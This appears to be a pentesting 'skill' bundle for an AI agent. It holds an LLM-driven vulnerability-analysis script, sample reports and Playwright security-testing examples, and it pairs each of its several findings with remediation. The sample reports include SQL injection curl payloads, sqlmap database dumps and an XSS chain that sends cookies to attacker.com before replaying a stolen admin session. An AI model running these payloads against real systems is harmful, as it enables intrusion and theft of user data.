Customization Before executing, check for user customizations at: If this directory exists, load and apply any PREFERENCES.md, configurations, or resources found there. These override default behavior. If the directory does not exist, proceed with skill defaults. 🚨 MANDATORY: Voice Notification (REQUIRED BEFORE ANY ACTION) You MUST send this notification BEFORE doing anything else when this skill is invoked. 1. Send voice notification : 2. Output text notification : This is not optional. Execute this curl command immediately upon skill invocation. WebAssessment Skill Security assessment infr…

\"${OUTPUT_DIR}/nuclei.txt\")\n\n## Nikto Web Server Issues\n$(grep '^+' \"${OUTPUT_DIR}/nikto.txt\")\n\n## Nmap Service Detection\n$(grep 'open' \"${OUTPUT_DIR}/nmap.xml\" | sed 's/\u003c[^>]*>//g')\n\nEOF\n\necho \"[*] Phase 3: Running Gemini 3 Pro analysis...\"\n\n# Deep vulnerability analysis\nllm -m gemini-3-pro-preview \\\n \"Analyze these security findings. Identify vulnerability chains, calculate risk scores, generate PoCs for critical findings, and create a prioritized remediation roadmap. Use the comprehensive analysis framework from the vulnerability-analysis-gemini-3 workflow.\" \\\n \"$(cat ${OUTPUT_DIR}/consolidated.md)\" \\\n > \"${OUTPUT_DIR}/analysis-report.md\"\n\necho \"[*] Phase 4: Extracting critical findings...\"\n\n# Extract critical findings for immediate action\nllm -m gemini-3-pro-preview \\\n \"Extract ONLY critical findings (risk score >= 8.0) from this report. For each: vulnerability name, location, CVSS score, one-sentence impact, immediate remediation action.\" \\\n \"$(cat ${OUTPUT_DIR}/analysis-report.md)\" \\\n > \"${OUTPUT_DIR}/critical-summary.md\"\n\necho \"[*] Phase 5: Generating PoCs...\"\n\n# Generate detailed PoCs for critical findings\nllm -m gemini-3-pro-preview \\\n \"For each critical finding, generate a detailed proof-of-concept with: setup requirements, step-by-step exploitation, curl commands or scripts, expected results, impact demonstration.\" \\\n \"$(cat ${OUTPUT_DIR}/critical-summary.md)\" \\\n > \"${OUTPUT_DIR}/pocs.md\"\n\necho \"[*] Phase 6: Creating remediation roadmap...\"\n\n# Prioritized remediation plan\nllm -m gemini-3-pro-preview \\\n \"Create a 4-phase remediation roadmap: Immediate (0-7 days), Short-term (1-4 weeks), Medium-term (1-3 months), Long-term (3-6 months). For each fix: specific steps, code examples, validation procedure, estimated effort.\" \\\n \"$(cat ${OUTPUT_DIR}/analysis-report.md)\" \\\n > \"${OUTPUT_DIR}/remediation-roadmap.md\"\n\necho \"[*] Analysis complete!\"\necho \"[*] Reports generated in: ${OUTPUT_DIR}/\"\necho \" - analysis-report.md (full analysis)\"\necho \" - critical-summary.md (executive summary)\"\necho \" - pocs.md (proof-of-concepts)\"\necho \" - remediation-roadmap.md (prioritized fixes)\"\n```\n\n**Run the complete workflow:**\n\n```bash\nchmod +x vulnerability-analysis.sh\n./vulnerability-analysis.sh\n```\n\n## Output Examples\n\n### Example: Critical Finding\n\n```markdown\n### Finding 1: SQL Injection in Login Endpoint\n\n- **Type:** SQL Injection (Boolean-based blind)\n- **Location:** POST /api/v1/auth/login (username parameter)\n- **CVSS Score:** 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n- **Exploitability:** 9/10 - Public PoC available, sqlmap automates exploitation, no WAF detected\n- **Business Impact:** 10/10 - Full database access, 50,000+ user records, PII exposure, GDPR violation\n- **Combined Risk:** 9.6/10 - **CRITICAL**\n\n**Description:**\nThe login endpoint is vulnerable to boolean-based blind SQL injection via the username parameter. The application constructs SQL queries using string concatenation without parameterization. Error-based and UNION-based injection are blocked by WAF, but boolean-based blind injection bypasses all defenses.\n\n**Exploitation Steps:**\n\n1. **Confirm SQL injection:**\n```bash\ncurl -X POST https://target.com/api/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"admin'\\'' AND 1=1--\",\"password\":\"test\"}'\n# Response time: 250ms (normal)\n\ncurl -X POST https://target.com/api/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"admin'\\'' AND 1=2--\",\"password\":\"test\"}'\n# Response time: 150ms (different - confirms SQLi)\n```\n\n2. **Enumerate database with sqlmap:**\n```bash\nsqlmap -u \"https://target.com/api/v1/auth/login\" \\\n --data='{\"username\":\"test\",\"password\":\"test\"}' \\\n --method=POST \\\n --dbms=mysql \\\n --technique=B \\\n --batch \\\n --dbs\n```\n\n3. **Extract user table:**\n```bash\nsqlmap -u \"https://target.com/api/v1/auth/login\" \\\n --data='{\"username\":\"test\",\"password\":\"test\"}' \\\n -D production \\\n -T users \\\n --dump\n```\n\n**Remediation:**\n\n- **Immediate (0-24h):**\n - Deploy WAF rule to block SQL injection patterns\n - Enable request logging and monitoring\n - Add rate limiting to login endpoint (10 req/min per IP)\n\n- **Long-term (1 week):**\n - Replace string concatenation with parameterized queries:\n ```javascript\n // BEFORE (vulnerable)\n const query = `SELECT * FROM users WHERE username = '${username}'`;\n\n // AFTER (secure)\n const query = 'SELECT * FROM users WHERE username = ?';\n db.execute(query, [username]);\n ```\n - Implement prepared statements throughout application\n - Add input validation and sanitization\n - Deploy database activity monitoring\n\n- **Verification:**\n - Run sqlmap again - should fail\n - Test with various injection payloads - all should be blocked\n - Verify parameterized queries in code review\n```\n\n### Example: Vulnerability Chain\n\n```markdown\n## Vulnerability Chain: XSS → Session Hijacking → Admin Takeover\n\n**Severity:** Critical\n**Combined CVSS:** 9.2 (chain multiplier applied)\n**Attack Path:** Reflected XSS → Cookie theft → Admin impersonation → Database access\n\n### Individual Vulnerabilities\n\n1. **Reflected XSS** (CVE-like: TARGET-2024-001)\n - Location: GET /search?q=[payload]\n - CVSS: 6.1 (Medium)\n - Impact alone: Defacement, phishing\n\n2. **Missing HttpOnly Flag** (TARGET-2024-002)\n - Location: session_token cookie\n - CVSS: 4.3 (Medium)\n - Impact alone: Cookie theft via XSS\n\n3. **No IP Binding on Sessions** (TARGET-2024-003)\n - Session valid from any IP address\n - CVSS: 5.3 (Medium)\n - Impact alone: Session replay attacks\n\n### Combined Exploitation\n\n**Attack Workflow:**\n\n1. **Craft XSS payload to steal cookies:**\n```html\nhttps://target.com/search?q=\u003cscript>\nfetch('https://attacker.com/steal?cookie='+document.cookie)\n\u003c/script>\n```\n\n2. **Social engineering - send link to admin:**\n```\n\"Check out these weird search results: [malicious link]\"\n```\n\n3. **Capture admin session token:**\n```\n# Attacker's server receives:\nsession_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...\n```\n\n4. **Replay session from attacker's IP:**\n```bash\ncurl https://target.com/admin/dashboard \\\n -H \"Cookie: session_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...\"\n# Success - admin dashboard access!\n```\n\n5. **Access sensitive admin functions:**\n```bash\n# Export all user data\ncurl https://target.com/admin/api/users/export \\\n -H \"Cookie: session_token=[stolen_token]\" \\\n -o all_users.csv\n```\n\n### Impact Analysis\n\n**Combined Impact:**\n- ✅ Full admin access without credentials\n- ✅ Access to all user data (50,000+ records)\n- ✅ Ability to modify system configuration\n- ✅ Potential for persistent backdoor creation\n- ✅ Complete application compromise\n\n**Why This Chain is Critical:**\nIndividual findings are Medium severity, but chained together they enable full application takeover. The combination makes the attack:\n- Easy to execute (low skill required)\n- Hard to detect (looks like normal admin activity)\n- High impact (complete compromise)\n\n### Breaking the Chain\n\n**Critical Link:** Missing HttpOnly flag\n- Fixing ONLY the XSS allows other XSS vectors\n- Fixing ONLY session binding allows cookie theft via MITM\n- **Fixing HttpOnly flag breaks the entire chain** - even if XSS exists, cookies cannot be stolen\n\n**Recommended Fix Priority:**\n1. **P0 - Immediate:** Add HttpOnly and Secure flags to session cookies\n2. **P1 - This week:** Fix reflected XSS vulnerability\n3. **P2 - This sprint:** Implement session IP binding + user-agent validation\n```\n\n## Tools & Resources\n\n### Required Tools\n- **llm CLI** (Simon Willison) - Gemini 3 Pro interface\n- **jq** - JSON parsing and processing\n- **xmllint** - XML parsing for nmap/burp outputs\n- **cvss** (Python) - CVSS score calculation\n\n### Installation\n\n```bash\n# Install llm with Gemini plugin\npip install llm\nllm install llm-gemini\n\n# Configure Gemini API key\nllm keys set gemini\n# Paste your API key when prompted\n\n# Verify Gemini 3 Pro access\nllm models | grep gemini-3\n\n# Install supporting tools\npip install cvss\nbrew install jq\n```\n\n### Security Tool Integration\n\n```bash\n# FFUF installation\ngo install github.com/ffuf/ffuf/v2@latest\n\n# Nuclei installation\ngo install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\nnuclei -update-templates\n\n# Nikto installation\ngit clone https://github.com/sullo/nikto\ncd nikto/program\nchmod +x nikto.pl\n\n# SQLMap installation\ngit clone https://github.com/sqlmapproject/sqlmap\ncd sqlmap\npython3 sqlmap.py --wizard\n```\n\n## Best Practices\n\n### Analysis Quality\n1. ✅ **Include full context** - Paste complete scan outputs, not summaries\n2. ✅ **Deduplicate findings** - Same vulnerability found by multiple tools = one finding\n3. ✅ **Preserve evidence** - Include request/response snippets, URLs, parameters\n4. ✅ **Business context** - Tell Gemini 3 about the application (e-commerce, healthcare, etc.)\n5. ✅ **Validate chains** - Test that multi-step attacks actually work\n\n### Gemini 3 Pro Optimization\n1. ✅ **Use structured prompts** - Clear requirements and output format\n2. ✅ **Leverage large context** - Feed all tools at once (don't split unnecessarily)\n3. ✅ **Request explanations** - Ask \"why\" and \"how\" for deep analysis\n4. ✅ **Iterate on findings** - Use follow-up prompts to drill deeper\n5. ✅ **Combine with domain knowledge** - AI finds patterns, you validate exploitability\n\n### Reporting Quality\n1. ✅ **Executive summary first** - 3-5 sentences for decision makers\n2. ✅ **Risk scores explained** - Show CVSS calculation and justification\n3. ✅ **Actionable PoCs** - Step-by-step, copy-paste commands\n4. ✅ **Remediation priority** - P0/P1/P2 with timelines\n5. ✅ **Validation steps** - How to test both vulnerability and fix\n\n## Common Pitfalls\n\n### Analysis Mistakes\n- ❌ Feeding too little context (Gemini 3 can handle 2M tokens - use it!)\n- ❌ Not validating AI-generated findings (always test PoCs manually)\n- ❌ Ignoring false positives (deduplicate and verify before reporting)\n- ❌ Missing vulnerability chains (explicitly ask Gemini to find connections)\n- ❌ Poor risk scoring (use CVSS calculator, don't guess)\n\n### Reporting Mistakes\n- ❌ No executive summary (decision makers won't read 50 pages)\n- ❌ Missing remediation guidance (vulnerability without fix is useless)\n- ❌ Unclear impact (explain business consequences, not just technical details)\n- ❌ No proof-of-concept (unvalidated findings = low credibility)\n- ❌ Wrong prioritization (critical CVSS but unexploitable ≠ critical priority)\n\n## Reference\n\n### Related Workflows\n- Master Methodology: `./pentest/MasterMethodology.md`\n- Reconnaissance: `./pentest/Reconnaissance.md`\n- Exploitation: `./pentest/Exploitation.md`\n- FFUF Guide: `./ffuf/FfufGuide.md`\n\n### External Resources\n- CVSS 3.1 Calculator: https://www.first.org/cvss/calculator/3.1\n- OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/\n- PortSwigger Web Security Academy: https://portswigger.net/web-security\n- HackerOne Disclosure Guidelines: https://www.hackerone.com/disclosure-guidelines\n\n### Further Reading\n- \"The Web Application Hacker's Handbook\" (Stuttard & Pinto)\n- \"Bug Bounty Bootcamp\" (Vickie Li)\n- \"Real-World Bug Hunting\" (Peter Yaworski)\n- Jason Haddix's \"Bug Hunter's Methodology\" (GitHub)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":30488,"content_sha256":"5425cd936a4f90f8637616f947edde1f9717058c4a656b906abdd20519a2e0c3"},{"filename":"Workflows/webapp/Examples.md","content":"# Web Application Testing Examples\n\n## Overview\nCommon Playwright testing patterns for web application security testing and functionality verification.\n\n## Examples Location\n`../../webapp-examples/`\n\n## Available Examples\n\n### 1. Element Discovery (`element_discovery.py`)\n\n**Purpose:** Discover buttons, links, and inputs on a page using Playwright's locator API.\n\n**When to use:**\n- Reconnaissance on unknown web applications\n- Finding interactive elements for testing\n- Building test automation scripts\n\n**Example Usage:**\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n page.goto('https://example.com')\n page.wait_for_load_state('networkidle')\n\n # Discover all buttons\n buttons = page.locator('button').all()\n print(f\"Found {len(buttons)} buttons\")\n\n # Discover all links\n links = page.locator('a').all()\n print(f\"Found {len(links)} links\")\n\n # Discover all inputs\n inputs = page.locator('input').all()\n print(f\"Found {len(inputs)} inputs\")\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `locator()` for flexible element selection\n- Use `.all()` to get all matching elements\n- Use role-based selectors for accessibility\n\n### 2. Static HTML Automation (`static_html_automation.py`)\n\n**Purpose:** Test local HTML files without running a web server.\n\n**When to use:**\n- Testing static HTML pages\n- Rapid prototyping and iteration\n- Offline testing scenarios\n\n**Example Usage:**\n```python\nfrom playwright.sync_api import sync_playwright\nfrom pathlib import Path\n\nhtml_file = Path('/path/to/file.html').absolute()\nfile_url = f'file://{html_file}'\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n page.goto(file_url)\n\n # Since it's static, no need to wait for networkidle\n # Directly interact with elements\n page.locator('button#submit').click()\n\n # Check results\n result = page.locator('#result').inner_text()\n print(f\"Result: {result}\")\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `file://` protocol for local files\n- Convert path to absolute path\n- No networkidle wait needed for static HTML\n- Faster iteration for testing\n\n### 3. Console Logging (`console_logging.py`)\n\n**Purpose:** Capture browser console logs during automation for debugging and error detection.\n\n**When to use:**\n- Debugging JavaScript errors\n- Monitoring for security warnings\n- Capturing application logs\n\n**Example Usage:**\n```python\nfrom playwright.sync_api import sync_playwright\n\ndef handle_console(msg):\n print(f\"[{msg.type}] {msg.text}\")\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n\n # Register console message handler\n page.on('console', handle_console)\n\n page.goto('https://example.com')\n page.wait_for_load_state('networkidle')\n\n # Perform actions that might generate console logs\n page.locator('button#trigger-error').click()\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `page.on('console', handler)` to capture logs\n- Filter by message type (log, warn, error, info)\n- Capture logs before they're cleared\n\n### 4. Form Automation\n\n**Purpose:** Fill and submit forms programmatically.\n\n**Example:**\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n page.goto('https://example.com/login')\n page.wait_for_load_state('networkidle')\n\n # Fill form fields\n page.locator('input[name=\"username\"]').fill('testuser')\n page.locator('input[name=\"password\"]').fill('testpass')\n\n # Submit form\n page.locator('button[type=\"submit\"]').click()\n\n # Wait for navigation\n page.wait_for_url('https://example.com/dashboard')\n\n # Verify login success\n assert 'Dashboard' in page.title()\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `.fill()` for input fields\n- Use `.click()` for submit buttons\n- Wait for navigation with `wait_for_url()`\n- Verify success with assertions\n\n### 5. Screenshot Capture\n\n**Purpose:** Take screenshots for visual verification and debugging.\n\n**Example:**\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n page.goto('https://example.com')\n page.wait_for_load_state('networkidle')\n\n # Full page screenshot\n page.screenshot(path='/tmp/full-page.png', full_page=True)\n\n # Element screenshot\n page.locator('#vulnerable-section').screenshot(path='/tmp/element.png')\n\n # Viewport screenshot\n page.screenshot(path='/tmp/viewport.png')\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `full_page=True` for complete page capture\n- Use `.locator().screenshot()` for specific elements\n- Screenshots saved immediately (no async needed in sync mode)\n\n### 6. Network Interception\n\n**Purpose:** Monitor and intercept network requests.\n\n**Example:**\n```python\nfrom playwright.sync_api import sync_playwright\n\ndef handle_request(request):\n print(f\"Request: {request.method} {request.url}\")\n\ndef handle_response(response):\n print(f\"Response: {response.status} {response.url}\")\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n\n # Register network handlers\n page.on('request', handle_request)\n page.on('response', handle_response)\n\n page.goto('https://example.com')\n page.wait_for_load_state('networkidle')\n\n browser.close()\n```\n\n**Key Patterns:**\n- Use `page.on('request', handler)` for request monitoring\n- Use `page.on('response', handler)` for response monitoring\n- Check for sensitive data in requests/responses\n\n### 7. Authentication State Management\n\n**Purpose:** Maintain authentication across multiple test sessions.\n\n**Example:**\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n context = browser.new_context()\n page = context.new_page()\n\n # Login\n page.goto('https://example.com/login')\n page.locator('input[name=\"username\"]').fill('testuser')\n page.locator('input[name=\"password\"]').fill('testpass')\n page.locator('button[type=\"submit\"]').click()\n page.wait_for_url('https://example.com/dashboard')\n\n # Save authentication state\n context.storage_state(path='auth.json')\n\n browser.close()\n\n# Later: Reuse authentication\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n context = browser.new_context(storage_state='auth.json')\n page = context.new_page()\n\n # Already authenticated\n page.goto('https://example.com/dashboard')\n # No need to login again\n\n browser.close()\n```\n\n**Key Patterns:**\n- Save state with `context.storage_state(path='file')`\n- Restore state with `new_context(storage_state='file')`\n- Persist cookies and localStorage\n\n## Testing Patterns for Security\n\n### IDOR Testing\n```python\n# Test if user IDs can be enumerated\npage.goto('https://example.com/profile/1234')\noriginal_content = page.content()\n\n# Try different user ID\npage.goto('https://example.com/profile/1235')\nnew_content = page.content()\n\n# Check if unauthorized access occurred\nif new_content != original_content and 'Access Denied' not in new_content:\n print(\"Potential IDOR vulnerability!\")\n```\n\n### XSS Testing\n```python\n# Test for reflected XSS\nxss_payload = '\u003cscript>alert(1)\u003c/script>'\npage.goto(f'https://example.com/search?q={xss_payload}')\npage.wait_for_load_state('networkidle')\n\n# Check if payload is reflected unencoded\nif xss_payload in page.content():\n print(\"Potential XSS vulnerability!\")\n```\n\n### CSRF Testing\n```python\n# Test for CSRF protection\npage.goto('https://example.com/settings')\npage.wait_for_load_state('networkidle')\n\n# Check for CSRF token\nform_html = page.locator('form').inner_html()\nif 'csrf' not in form_html.lower() and '_token' not in form_html.lower():\n print(\"Potential missing CSRF protection!\")\n```\n\n## Using with Server Helper\n\nFor dynamic applications, use the server helper:\n\n```bash\npython ../../webapp-scripts/with_server.py \\\n --server \"npm run dev\" \\\n --port 5173 \\\n -- python my_test.py\n```\n\n## Best Practices\n\n1. **Always wait for networkidle** - On dynamic apps\n2. **Use descriptive selectors** - Role-based or data-testid\n3. **Capture screenshots** - For proof-of-concept documentation\n4. **Monitor console** - Catch JavaScript errors\n5. **Save authentication** - Reuse login state across tests\n6. **Clean up resources** - Always close browser\n\n## Reconnaissance-Then-Action Pattern\n\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True)\n page = browser.new_page()\n page.goto('https://example.com')\n page.wait_for_load_state('networkidle')\n\n # 1. Reconnaissance - take screenshot\n page.screenshot(path='/tmp/inspect.png', full_page=True)\n\n # 2. Reconnaissance - discover elements\n buttons = page.locator('button').all()\n forms = page.locator('form').all()\n inputs = page.locator('input').all()\n\n print(f\"Found: {len(buttons)} buttons, {len(forms)} forms, {len(inputs)} inputs\")\n\n # 3. Action - interact based on discoveries\n if len(forms) > 0:\n # Analyze first form\n form_html = forms[0].inner_html()\n print(form_html)\n\n # Test for XSS\n if len(inputs) > 0:\n inputs[0].fill('\u003cscript>alert(1)\u003c/script>')\n buttons[0].click()\n page.wait_for_timeout(1000)\n\n # Check if XSS executed\n page.screenshot(path='/tmp/xss-result.png')\n\n browser.close()\n```\n\n## See Also\n\n- Web app testing guide: `./TestingGuide.md`\n- Server helper script: `../../webapp-scripts/with_server.py`\n- Playwright documentation: https://playwright.dev/python/\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":9931,"content_sha256":"dc501ec4c5b5e98997b38c167206ff7395184bb3e327a5d32c2a358d8b1543d0"},{"filename":"Workflows/webapp/TestingGuide.md","content":"---\nname: webapp-testing\ndescription: Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.\nlicense: Complete terms in LICENSE.txt\n---\n\n# Web Application Testing\n\n## 🎯 Load Full PAI Context\n\n**Before starting any task with this skill, load complete PAI context:**\n\n`read ~/.claude/PAI/SKILL.md`\n\nThis provides access to:\n- Complete contact list (Angela, Bunny, Saša, Greg, team members)\n- Stack preferences (TypeScript>Python, bun>npm, uv>pip)\n- Security rules and repository safety protocols\n- Response format requirements (structured emoji format)\n- Voice IDs for agent routing (ElevenLabs)\n- Personal preferences and operating instructions\n\nTo test local web applications, write native Python Playwright scripts.\n\n**Helper Scripts Available**:\n- `scripts/with_server.py` - Manages server lifecycle (supports multiple servers)\n\n**Always run scripts with `--help` first** to see usage. DO NOT read the source until you try running the script first and find that a customized solution is abslutely necessary. These scripts can be very large and thus pollute your context window. They exist to be called directly as black-box scripts rather than ingested into your context window.\n\n## Decision Tree: Choosing Your Approach\n\n```\nUser task → Is it static HTML?\n ├─ Yes → Read HTML file directly to identify selectors\n │ ├─ Success → Write Playwright script using selectors\n │ └─ Fails/Incomplete → Treat as dynamic (below)\n │\n └─ No (dynamic webapp) → Is the server already running?\n ├─ No → Run: python scripts/with_server.py --help\n │ Then use the helper + write simplified Playwright script\n │\n └─ Yes → Reconnaissance-then-action:\n 1. Navigate and wait for networkidle\n 2. Take screenshot or inspect DOM\n 3. Identify selectors from rendered state\n 4. Execute actions with discovered selectors\n```\n\n## Example: Using with_server.py\n\nTo start a server, run `--help` first, then use the helper:\n\n**Single server:**\n```bash\npython scripts/with_server.py --server \"npm run dev\" --port 5173 -- python your_automation.py\n```\n\n**Multiple servers (e.g., backend + frontend):**\n```bash\npython scripts/with_server.py \\\n --server \"cd backend && python server.py\" --port 3000 \\\n --server \"cd frontend && npm run dev\" --port 5173 \\\n -- python your_automation.py\n```\n\nTo create an automation script, include only Playwright logic (servers are managed automatically):\n```python\nfrom playwright.sync_api import sync_playwright\n\nwith sync_playwright() as p:\n browser = p.chromium.launch(headless=True) # Always launch chromium in headless mode\n page = browser.new_page()\n page.goto('http://localhost:5173') # Server already running and ready\n page.wait_for_load_state('networkidle') # CRITICAL: Wait for JS to execute\n # ... your automation logic\n browser.close()\n```\n\n## Reconnaissance-Then-Action Pattern\n\n1. **Inspect rendered DOM**:\n ```python\n page.screenshot(path='/tmp/inspect.png', full_page=True)\n content = page.content()\n page.locator('button').all()\n ```\n\n2. **Identify selectors** from inspection results\n\n3. **Execute actions** using discovered selectors\n\n## Common Pitfall\n\n❌ **Don't** inspect the DOM before waiting for `networkidle` on dynamic apps\n✅ **Do** wait for `page.wait_for_load_state('networkidle')` before inspection\n\n## Best Practices\n\n- **Use bundled scripts as black boxes** - To accomplish a task, consider whether one of the scripts available in `scripts/` can help. These scripts handle common, complex workflows reliably without cluttering the context window. Use `--help` to see usage, then invoke directly. \n- Use `sync_playwright()` for synchronous scripts\n- Always close the browser when done\n- Use descriptive selectors: `text=`, `role=`, CSS selectors, or IDs\n- Add appropriate waits: `page.wait_for_selector()` or `page.wait_for_timeout()`\n\n## Reference Files\n\n- **examples/** - Examples showing common patterns:\n - `element_discovery.py` - Discovering buttons, links, and inputs on a page\n - `static_html_automation.py` - Using file:// URLs for local HTML\n - `console_logging.py` - Capturing console logs during automation","content_type":"text/markdown; charset=utf-8","language":"markdown","size":4398,"content_sha256":"95255a65f36821218b6d6efff3ee48b09f2ebb0fd01a449f00ff7d3874a8f942"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":2},"content":[{"text":"Customization","type":"text"}]},{"type":"paragraph","content":[{"text":"Before executing, check for user customizations at:","type":"text","marks":[{"type":"strong"}]},{"text":" ","type":"text"},{"text":"~/.claude/PAI/USER/SKILLCUSTOMIZATIONS/WebAssessment/","type":"text","marks":[{"type":"code_inline"}]}]},{"type":"paragraph","content":[{"text":"If this directory exists, load and apply any PREFERENCES.md, configurations, or resources found there. These override default behavior. If the directory does not exist, proceed with skill defaults.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"🚨 MANDATORY: Voice Notification (REQUIRED BEFORE ANY ACTION)","type":"text"}]},{"type":"paragraph","content":[{"text":"You MUST send this notification BEFORE doing anything else when this skill is invoked.","type":"text","marks":[{"type":"strong"}]}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Send voice notification","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"curl -s -X POST http://localhost:8888/notify \\\n -H \"Content-Type: application/json\" \\\n -d '{\"message\": \"Running the WORKFLOWNAME workflow in the WebAssessment skill to ACTION\"}' \\\n > /dev/null 2>&1 &","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Output text notification","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Running the **WorkflowName** workflow in the **WebAssessment** skill to ACTION...","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"This is not optional. Execute this curl command immediately upon skill invocation.","type":"text","marks":[{"type":"strong"}]}]},{"type":"heading","attrs":{"level":1},"content":[{"text":"WebAssessment Skill","type":"text"}]},{"type":"paragraph","content":[{"text":"Security assessment infrastructure integrating reconnaissance, threat modeling, and vulnerability testing.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow Routing","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Trigger","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Workflow","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"understand application\", \"what does this app do\", \"map the application\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"UnderstandApplication","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"threat model\", \"attack scenarios\", \"how would I attack\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CreateThreatModel","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"pentest\", \"security assessment\", \"test for vulnerabilities\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Pentest/MasterMethodology","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"fuzz with ffuf\", \"directory fuzzing\", \"content discovery\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ffuf/FfufGuide","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"OSINT\", \"reconnaissance\", \"open source intelligence\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"osint/MasterGuide","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"test web app\", \"Playwright\", \"browser automation\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"webapp/TestingGuide","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"bug bounty\", \"bounty programs\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"bug-bounty/Programs","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"\"vulnerability analysis with AI\", \"Gemini analysis\"","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"VulnerabilityAnalysisGemini3","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Skill Integration","type":"text"}]},{"type":"paragraph","content":[{"text":"WebAssessment coordinates with specialized 